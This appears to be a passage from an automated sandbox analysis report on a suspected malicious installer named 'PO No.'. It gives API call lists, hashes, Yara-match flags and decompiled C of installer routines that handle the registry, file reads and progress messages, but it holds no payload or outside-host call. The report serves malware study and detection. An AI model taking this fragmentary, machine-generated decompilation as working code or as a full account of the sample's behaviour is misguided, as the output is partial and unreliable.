                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC), ref: 0040546F
                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 334405425-0
                                                                      • Opcode ID: 44d570d4ef42a6af9798bac81a48d6e43403590213f26621d83d999ce1ed40c7
                                                                      • Instruction ID: efb744b1bbbaa1f1e58e2693dd3ff93cd36a27706c6aad24c330354b17a2434d
                                                                      • Opcode Fuzzy Hash: 44d570d4ef42a6af9798bac81a48d6e43403590213f26621d83d999ce1ed40c7
                                                                      • Instruction Fuzzy Hash: 6F21C531900218EBCF20AFA5CE4CA9E7A70AF04354F60413BF610B61E1DBBD4991DA6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
                                                                      				void* _t9;
                                                                      				int _t10;
                                                                      				long _t13;
                                                                      				int* _t16;
                                                                      				intOrPtr _t21;
                                                                      				void* _t22;
                                                                      				short* _t24;
                                                                      				void* _t26;
                                                                      				void* _t29;
                                                                      
                                                                      				_t24 = __esi;
                                                                      				_t21 = __edx;
                                                                      				_t16 = __ebx;
                                                                      				_t9 = E00402C77(_t29, 0x20019); // executed
                                                                      				_t22 = _t9;
                                                                      				_t10 = E00402C15(3);
                                                                      				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
                                                                      				 *__esi = __ebx;
                                                                      				if(_t22 == __ebx) {
                                                                      					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                      				} else {
                                                                      					 *(_t26 + 8) = 0x3ff;
                                                                      					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
                                                                      						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                      						__eflags = _t13;
                                                                      						if(_t13 != 0) {
                                                                      							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                      						}
                                                                      					} else {
                                                                      						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
                                                                      					}
                                                                      					_t24[0x3ff] = _t16;
                                                                      					_push(_t22);
                                                                      					RegCloseKey();
                                                                      				}
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t26 - 4));
                                                                      				return 0;
                                                                      			}












                                                                      0x004024f2
                                                                      0x004024f2
                                                                      0x004024f2
                                                                      0x004024f7
                                                                      0x004024fe
                                                                      0x00402500
                                                                      0x00402508
                                                                      0x0040250b
                                                                      0x0040250e
                                                                      0x00402885
                                                                      0x00402514
                                                                      0x0040251c
                                                                      0x0040251f
                                                                      0x00402538
                                                                      0x0040253e
                                                                      0x00402540
                                                                      0x00402542
                                                                      0x00402542
                                                                      0x00402521
                                                                      0x00402525
                                                                      0x00402525
                                                                      0x00402549
                                                                      0x00402550
                                                                      0x00402551
                                                                      0x00402551
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsh409.tmp,00000000,00000011,00000002), ref: 00402551
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Enum$CloseValue
                                                                      • String ID:
                                                                      • API String ID: 397863658-0
                                                                      • Opcode ID: 297b237e24fbbf63aa7ca08728d7b3950c3333922afcc1c5b6d3d1192ed08725
                                                                      • Instruction ID: 4fa2f3c06f6248971957712acf2942ced6ba336c37b2851dfbda8b2cd28c17b0
                                                                      • Opcode Fuzzy Hash: 297b237e24fbbf63aa7ca08728d7b3950c3333922afcc1c5b6d3d1192ed08725
                                                                      • Instruction Fuzzy Hash: 6D017171904104EFE7159FA5DE89ABFB6B8EF44348F10403EF105A62D0DAB84E459B69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumWindows.USER32(01D58D89,?,0000094D,51DA0361,00000000), ref: 04123176
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: EnumWindows
                                                                      • String ID: 9
                                                                      • API String ID: 1129996299-2366072709
                                                                      • Opcode ID: 60578afea912db74a886494130a39401d28ea2f7cadc7be5013276b07c629189
                                                                      • Instruction ID: f6b579de2ecbdf5b4bbf15638ad85cce68f65d44000b447f25689dd03354d93d
                                                                      • Opcode Fuzzy Hash: 60578afea912db74a886494130a39401d28ea2f7cadc7be5013276b07c629189
                                                                      • Instruction Fuzzy Hash: D0F0592521C3C88FDB669F3189509D67FF0DF83214B0805CAC8E1876E2C3200515C725
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumWindows.USER32(01D58D89,?,0000094D,51DA0361,00000000), ref: 04123176
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_4120000_PO No.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: EnumWindows
                                                                      • String ID: 9
                                                                      • API String ID: 1129996299-2366072709
                                                                      • Opcode ID: 36a64f593d0462d9fda7527fd0d0bb6bad9a9a40cdb4658744ae8b5f09e52bfa
                                                                      • Instruction ID: 74a09ce60cd2ca1965c9d112ddbc4bfcc6d50d1626da804619cbfec7bb36df81
                                                                      • Opcode Fuzzy Hash: 36a64f593d0462d9fda7527fd0d0bb6bad9a9a40cdb4658744ae8b5f09e52bfa
                                                                      • Instruction Fuzzy Hash: 4BF027362187CD9FD769DF359C805E6B7E1DFC3320F090699C8A187691C3641612CB11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileA.KERNELBASE(00000000), ref: 1000295B
                                                                      • GetLastError.KERNEL32 ref: 10002A62
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7117138785.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000001.00000002.7117107508.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117175931.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117207358.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_10000000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CreateErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 1214770103-0
                                                                      • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                      • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                                      • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                      • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E004031BA(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                      				long _v8;
                                                                      				long _t21;
                                                                      				long _t22;
                                                                      				void* _t24;
                                                                      				long _t26;
                                                                      				int _t27;
                                                                      				long _t28;
                                                                      				void* _t29;
                                                                      				void* _t30;
                                                                      				long _t31;
                                                                      				long _t32;
                                                                      				long _t36;
                                                                      
                                                                      				_t21 = _a4;
                                                                      				if(_t21 >= 0) {
                                                                      					_t32 = _t21 +  *0x42a2b8;
                                                                      					 *0x418ed4 = _t32;
                                                                      					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                      				}
                                                                      				_t22 = E004032C2(4);
                                                                      				if(_t22 >= 0) {
                                                                      					_t24 = E00405F25( *0x40a01c,  &_a4, 4); // executed
                                                                      					if(_t24 == 0) {
                                                                      						L18:
                                                                      						_push(0xfffffffd);
                                                                      						goto L19;
                                                                      					} else {
                                                                      						 *0x418ed4 =  *0x418ed4 + 4;
                                                                      						_t36 = E004032C2(_a4);
                                                                      						if(_t36 < 0) {
                                                                      							L21:
                                                                      							_t22 = _t36;
                                                                      						} else {
                                                                      							if(_a12 != 0) {
                                                                      								_t26 = _a4;
                                                                      								if(_t26 >= _a16) {
                                                                      									_t26 = _a16;
                                                                      								}
                                                                      								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                      								if(_t27 != 0) {
                                                                      									_t36 = _v8;
                                                                      									 *0x418ed4 =  *0x418ed4 + _t36;
                                                                      									goto L21;
                                                                      								} else {
                                                                      									goto L18;
                                                                      								}
                                                                      							} else {
                                                                      								if(_a4 <= 0) {
                                                                      									goto L21;
                                                                      								} else {
                                                                      									while(1) {
                                                                      										_t28 = _a4;
                                                                      										if(_a4 >= 0x4000) {
                                                                      											_t28 = 0x4000;
                                                                      										}
                                                                      										_v8 = _t28;
                                                                      										_t29 = E00405F25( *0x40a01c, 0x414ed0, _t28); // executed
                                                                      										if(_t29 == 0) {
                                                                      											goto L18;
                                                                      										}
                                                                      										_t30 = E00405F54(_a8, 0x414ed0, _v8); // executed
                                                                      										if(_t30 == 0) {
                                                                      											_push(0xfffffffe);
                                                                      											L19:
                                                                      											_pop(_t22);
                                                                      										} else {
                                                                      											_t31 = _v8;
                                                                      											_a4 = _a4 - _t31;
                                                                      											 *0x418ed4 =  *0x418ed4 + _t31;
                                                                      											_t36 = _t36 + _t31;
                                                                      											if(_a4 > 0) {
                                                                      												continue;
                                                                      											} else {
                                                                      												goto L21;
                                                                      											}
                                                                      										}
                                                                      										goto L22;
                                                                      									}
                                                                      									goto L18;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L22:
                                                                      				return _t22;
                                                                      			}















                                                                      0x004031be
                                                                      0x004031c7
                                                                      0x004031d0
                                                                      0x004031d4
                                                                      0x004031df
                                                                      0x004031df
                                                                      0x004031e7
                                                                      0x004031ee
                                                                      0x00403200
                                                                      0x00403207
                                                                      0x004032ac
                                                                      0x004032ac
                                                                      0x00000000
                                                                      0x0040320d
                                                                      0x00403210
                                                                      0x0040321c
                                                                      0x00403220
                                                                      0x004032ba
                                                                      0x004032ba
                                                                      0x00403226
                                                                      0x00403229
                                                                      0x00403288
                                                                      0x0040328e
                                                                      0x00403290
                                                                      0x00403290
                                                                      0x004032a2
                                                                      0x004032aa
                                                                      0x004032b1
                                                                      0x004032b4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040322b
                                                                      0x0040322e
                                                                      0x00000000
                                                                      0x00403234
                                                                      0x00403239
                                                                      0x00403240
                                                                      0x00403243
                                                                      0x00403245
                                                                      0x00403245
                                                                      0x00403252
                                                                      0x00403255
                                                                      0x0040325c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403265
                                                                      0x0040326c
                                                                      0x00403284
                                                                      0x004032ae
                                                                      0x004032ae
                                                                      0x0040326e
                                                                      0x0040326e
                                                                      0x00403271
                                                                      0x00403274
                                                                      0x0040327a
                                                                      0x00403280
                                                                      0x00000000
                                                                      0x00403282
                                                                      0x00000000
                                                                      0x00403282
                                                                      0x00403280
                                                                      0x00000000
                                                                      0x0040326c
                                                                      0x00000000
                                                                      0x00403239
                                                                      0x0040322e
                                                                      0x00403229
                                                                      0x00403220
                                                                      0x00403207
                                                                      0x004032bc
                                                                      0x004032bf

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 004031DF
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                                      • Instruction ID: 4c6ae7a0626839fce45d877b24888c0af913333af22313e68c4d1644c71cb298
                                                                      • Opcode Fuzzy Hash: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                                      • Instruction Fuzzy Hash: 3B319C3020021AFFDB109F95ED84ADB3F68EB04359B1085BEF904E6190D778CE509BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 84%
                                                                      			E0040247E(int* __ebx, char* __esi) {
                                                                      				void* _t17;
                                                                      				short* _t18;
                                                                      				void* _t33;
                                                                      				void* _t37;
                                                                      				void* _t40;
                                                                      
                                                                      				_t35 = __esi;
                                                                      				_t27 = __ebx;
                                                                      				_t17 = E00402C77(_t40, 0x20019); // executed
                                                                      				_t33 = _t17;
                                                                      				_t18 = E00402C37(0x33);
                                                                      				 *__esi = __ebx;
                                                                      				if(_t33 == __ebx) {
                                                                      					 *(_t37 - 4) = 1;
                                                                      				} else {
                                                                      					 *(_t37 - 0x4c) = 0x800;
                                                                      					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c) != 0) {
                                                                      						L7:
                                                                      						 *_t35 = _t27;
                                                                      						 *(_t37 - 4) = 1;
                                                                      					} else {
                                                                      						if( *(_t37 + 8) == 4) {
                                                                      							__eflags =  *(_t37 - 0x18) - __ebx;
                                                                      							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
                                                                      							E004062F7(__esi,  *__esi);
                                                                      						} else {
                                                                      							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                      								 *(_t37 - 4) =  *(_t37 - 0x18);
                                                                      								_t35[0x7fe] = _t27;
                                                                      							} else {
                                                                      								goto L7;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_push(_t33);
                                                                      					RegCloseKey();
                                                                      				}
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *(_t37 - 4);
                                                                      				return 0;
                                                                      			}








                                                                      0x0040247e
                                                                      0x0040247e
                                                                      0x00402483
                                                                      0x0040248a
                                                                      0x0040248c
                                                                      0x00402493
                                                                      0x00402496
                                                                      0x00402885
                                                                      0x0040249c
                                                                      0x0040249f
                                                                      0x004024ba
                                                                      0x004024ea
                                                                      0x004024ea
                                                                      0x004024ed
                                                                      0x004024bc
                                                                      0x004024c0
                                                                      0x004024d9
                                                                      0x004024e0
                                                                      0x004024e3
                                                                      0x004024c2
                                                                      0x004024c5
                                                                      0x004024d0
                                                                      0x00402549
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004024c5
                                                                      0x004024c0
                                                                      0x00402550
                                                                      0x00402551
                                                                      0x00402551
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsh409.tmp,00000000,00000011,00000002), ref: 00402551
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3356406503-0
                                                                      • Opcode ID: a3b88ef37a04c447d509aafcd647c8bb55f7a85eb83bcf9e8b78a58130226466
                                                                      • Instruction ID: 2d27e3624369fee7c217219a4e344138e42523264533ea489648bddc6477d6d2
                                                                      • Opcode Fuzzy Hash: a3b88ef37a04c447d509aafcd647c8bb55f7a85eb83bcf9e8b78a58130226466
                                                                      • Instruction Fuzzy Hash: 53119171900209EBEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D7B84A45DB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 69%
                                                                      			E00401389(signed int _a4) {
                                                                      				intOrPtr* _t6;
                                                                      				void* _t8;
                                                                      				void* _t10;
                                                                      				signed int _t11;
                                                                      				void* _t12;
                                                                      				signed int _t16;
                                                                      				signed int _t17;
                                                                      				void* _t18;
                                                                      
                                                                      				_t17 = _a4;
                                                                      				while(_t17 >= 0) {
                                                                      					_t6 = _t17 * 0x1c +  *0x42a290;
                                                                      					if( *_t6 == 1) {
                                                                      						break;
                                                                      					}
                                                                      					_push(_t6); // executed
                                                                      					_t8 = E00401434(); // executed
                                                                      					if(_t8 == 0x7fffffff) {
                                                                      						return 0x7fffffff;
                                                                      					}
                                                                      					_t10 = E0040136D(_t8);
                                                                      					if(_t10 != 0) {
                                                                      						_t11 = _t10 - 1;
                                                                      						_t16 = _t17;
                                                                      						_t17 = _t11;
                                                                      						_t12 = _t11 - _t16;
                                                                      					} else {
                                                                      						_t12 = _t10 + 1;
                                                                      						_t17 = _t17 + 1;
                                                                      					}
                                                                      					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                      						 *0x42922c =  *0x42922c + _t12;
                                                                      						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42922c, 0x7530,  *0x429214), 0);
                                                                      					}
                                                                      				}
                                                                      				return 0;
                                                                      			}











                                                                      0x0040138a
                                                                      0x004013fa
                                                                      0x0040139b
                                                                      0x004013a0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004013a2
                                                                      0x004013a3
                                                                      0x004013ad
                                                                      0x00000000
                                                                      0x00401404
                                                                      0x004013b0
                                                                      0x004013b7
                                                                      0x004013bd
                                                                      0x004013be
                                                                      0x004013c0
                                                                      0x004013c2
                                                                      0x004013b9
                                                                      0x004013b9
                                                                      0x004013ba
                                                                      0x004013ba
                                                                      0x004013c9
                                                                      0x004013cb
                                                                      0x004013f4
                                                                      0x004013f4
                                                                      0x004013c9
                                                                      0x00000000

                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                      • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                      • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                      • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00402388(void* __ebx) {
                                                                      				long _t7;
                                                                      				void* _t14;
                                                                      				long _t18;
                                                                      				intOrPtr _t20;
                                                                      				void* _t22;
                                                                      				void* _t23;
                                                                      
                                                                      				_t14 = __ebx;
                                                                      				_t26 =  *(_t23 - 0x18) - __ebx;
                                                                      				_t20 =  *((intOrPtr*)(_t23 - 0x24));
                                                                      				if( *(_t23 - 0x18) != __ebx) {
                                                                      					_t7 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1); // executed
                                                                      					_t18 = _t7;
                                                                      					goto L4;
                                                                      				} else {
                                                                      					_t22 = E00402C77(_t26, 2);
                                                                      					if(_t22 == __ebx) {
                                                                      						L6:
                                                                      						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                                      					} else {
                                                                      						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
                                                                      						RegCloseKey(_t22);
                                                                      						L4:
                                                                      						if(_t18 != _t14) {
                                                                      							goto L6;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t23 - 4));
                                                                      				return 0;
                                                                      			}









                                                                      0x00402388
                                                                      0x00402388
                                                                      0x0040238b
                                                                      0x0040238e
                                                                      0x004023ca
                                                                      0x004023cf
                                                                      0x00000000
                                                                      0x00402390
                                                                      0x00402397
                                                                      0x0040239b
                                                                      0x00402885
                                                                      0x00402885
                                                                      0x004023a1
                                                                      0x004023b1
                                                                      0x004023b3
                                                                      0x004023d1
                                                                      0x004023d3
                                                                      0x00000000
                                                                      0x004023d9
                                                                      0x004023d3
                                                                      0x0040239b
                                                                      0x00402ac2
                                                                      0x00402ace

                                                                      APIs
                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7112519999.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.7112496220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112577962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112784945.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112818628.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112848456.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112895856.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7112923145.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_400000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteValue
                                                                      • String ID:
                                                                      • API String ID: 2831762973-0
                                                                      • Opcode ID: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
                                                                      • Instruction ID: eeebe11236d86b478005370e27fb04b66889edd8f93d7ff1d49de92df4b57ee5
                                                                      • Opcode Fuzzy Hash: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
                                                                      • Instruction Fuzzy Hash: 58F09632A04114DBE711BBA49B4EABEB2A59B44354F16053FFA02F71C1DEFC4D41866D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E61
